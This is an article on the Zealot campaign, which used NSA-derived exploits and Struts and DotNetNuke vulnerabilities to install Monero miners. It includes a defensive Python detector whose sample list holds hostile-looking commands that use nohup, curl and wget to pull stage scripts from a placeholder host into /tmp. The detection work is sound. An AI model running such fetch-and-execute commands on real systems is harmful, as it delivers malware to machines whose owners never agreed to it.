Named the Zealot campaign, this malware targets Linux and Windows machines on an internal network. The most notable property of Zealot is its use of the NSA's EternalBlue and EternalSynergy exploits.
In case you’re wondering about the origins of the name Zealot, it’s based on the name of the zip file containing the Python scripts with NSA exploits, as found by the researchers at F5 Networks.
The two vulnerabilities exploited by this highly sophisticated, multi-stage attack are:
- CVE-2017-5638: Apache Struts Jakarta Multipart Parser attack
- CVE-2017-9822: DotNetNuke (DNN) content management system vulnerability
On Linux machines, the attackers use Python scripts from EmpireProject and install a Monero miner. Zealot tries to fetch the script from a remote server using a "nohup" command, which allows it to keep running even after the shell is closed. If connecting to the server over a TCP socket fails, "curl" and "wget" are used to download the files instead.
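As an added defender-side illustration (not code from the F5 report or this article), the following Python heuristic flags the behaviour described above in process-audit command lines: a fetch via curl, wget or Python's urllib that is detached with nohup, or a downloaded script dropped into a world-writable directory. The command lines and the 203.0.113.10 host are constructed samples.

```python
import re
from typing import NamedTuple, Optional

class Finding(NamedTuple):
    command: str
    host: str        # remote host the command pulls from (empty if none parsed)
    reasons: tuple   # which heuristics fired, in order

# Heuristics for the Zealot Linux stage: nohup-wrapped fetches via curl/wget or urllib.
NOHUP_RE = re.compile(r"(?:^|[;&|(]\s*)nohup\s")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^;|&]*?https?://", re.I)
PYFETCH_RE = re.compile(r"\bpython[23]?\b.*?\burl(?:lib|open)\w*\b.*?https?://", re.I)
TMP_SCRIPT_RE = re.compile(r"(?:-o|-O|>)\s*/(?:tmp|dev/shm|var/tmp)/\S+\.(?:py|sh)\b")
URL_RE = re.compile(r"https?://([^/\s'\"]+)")

# Constructed sample command lines, as a process-audit log would record them.
SAMPLE_COMMANDS = [
    "nohup python -c 'import urllib2; urllib2.urlopen(\"http://203.0.113.10/stage1.py\").read()' &",
    "nohup curl -s http://203.0.113.10/stage1.py -o /tmp/stage1.py &",
    "wget -q http://203.0.113.10/stage2.py -O /tmp/stage2.py",
    "nohup ./backup.sh > /var/log/backup.log 2>&1 &",       # benign: detached, no fetch
    "curl -s https://api.example.com/status",              # benign: fetch, not detached
    "python manage.py runserver",                          # benign
]

def analyse(cmd: str) -> Optional[Finding]:
    """Return a Finding when a remote fetch is detached or drops a script in /tmp."""
    reasons = []
    if NOHUP_RE.search(cmd):
        reasons.append("nohup-detached")
    if FETCH_RE.search(cmd):
        reasons.append("curl/wget fetch")
    if PYFETCH_RE.search(cmd):
        reasons.append("python in-memory fetch")
    if TMP_SCRIPT_RE.search(cmd):
        reasons.append("script written to world-writable dir")
    if not any(r.endswith("fetch") for r in reasons):
        return None  # no remote fetch at all: nohup on its own is normal admin use
    if "nohup-detached" in reasons or "script written to world-writable dir" in reasons:
        m = URL_RE.search(cmd)
        return Finding(cmd, m.group(1) if m else "", tuple(reasons))
    return None

def scan(commands):
    return [f for f in (analyse(c) for c in commands) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMANDS):
        print(finding.host, finding.reasons, finding.command)
```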
On the Windows platform, PowerShell is used to download and install the miner. For added stealth, the miner is delivered as a DLL and injected into the PowerShell process using a DLL injection technique.
According to the researchers, the attackers have made at least $8,500 from this campaign. The total could be higher, however, as the attackers may be using other wallets as well. The researchers also expect that the Zealot campaign could open new attack vectors for delivering malware on internal networks.